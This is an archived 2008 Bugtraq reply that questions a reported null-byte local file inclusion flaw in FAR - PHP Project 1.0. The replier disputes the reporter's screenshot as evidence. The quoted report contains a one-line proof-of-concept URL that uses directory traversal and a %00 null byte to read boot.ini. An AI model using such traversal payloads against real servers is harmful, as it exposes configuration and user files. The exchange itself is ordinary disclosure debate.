lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 21 Aug 2008 21:46:53 -0400
From: William McAfee <sec-community@...goodhacker.com>
To: beenudel1986@...il.com
Cc: bugtraq@...urityfocus.com
Subject: Re: Null Byte Local file Inclusion in FAR - PHP Project version:1.0

I'm sorry, but your screenshot actually leads me to not have much more
confidence.  I noticed your titlebar is modified, so that tells me the
script is most likely modified in some way.  Provide us with a pure
script, please.  Also, on an unrelated note, why are you running
professional?  Why did you blank out the bottom half of the window?
What are you hiding?

On Wed, 2008-08-20 at 20:56 -0600, beenudel1986@...il.com wrote:
> ################################################################
> # .___ __ _______ .___ #
> # __| _/____ _______| | __ ____ \ _ \ __| _/____ #
> # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
> # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
> # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
> # \/ \/ \/ #
> # ___________ ______ _ __ #
> # _/ ___\_ __ \_/ __ \ \/ \/ / #
> # \ \___| | \/\ ___/\ / #
> # \___ >__| \___ >\/\_/ #
> # est.2007 \/ \/ forum.darkc0de.com #
> 
> ################################################################
> 
> # Web Application: FAR - PHP Project version:1.0
> # Vendor's Address :www.far-php.ro
> ################################################################
> 
> 
> ################################################################
> Author: Beenu Arora
> Address: www.beenuarora.com
> ################################################################
> 
> 
> #Python Dark Scripts: www.beenuarora.com/work.html
> 
> ################################################################
> #Date Found: 21/08/08
> #Severity: High
> #Security Risk:Null Byte Files Retrieval
> #Explaination:It is possible to view the contents of any file (e.g. databases, user information or configuration files) on the web server (under the permission restrictions of the web server user)
> 
> 
> #POC: http://localhost/farver/index.php?c=/../../../../../../../../boot.ini%00
> #For the POC pic visit: www.beenuarora.com/POC.bmp
> 
> ################################################################
>  ______________________________________________________________________________________
> |Greetz: D3hydr8,rascal,rsauron,patrick,baltazar,sinner_01 and rest of team memebers. |
> |_____________________________________________________________________________________|

Powered by blists - more mailing lists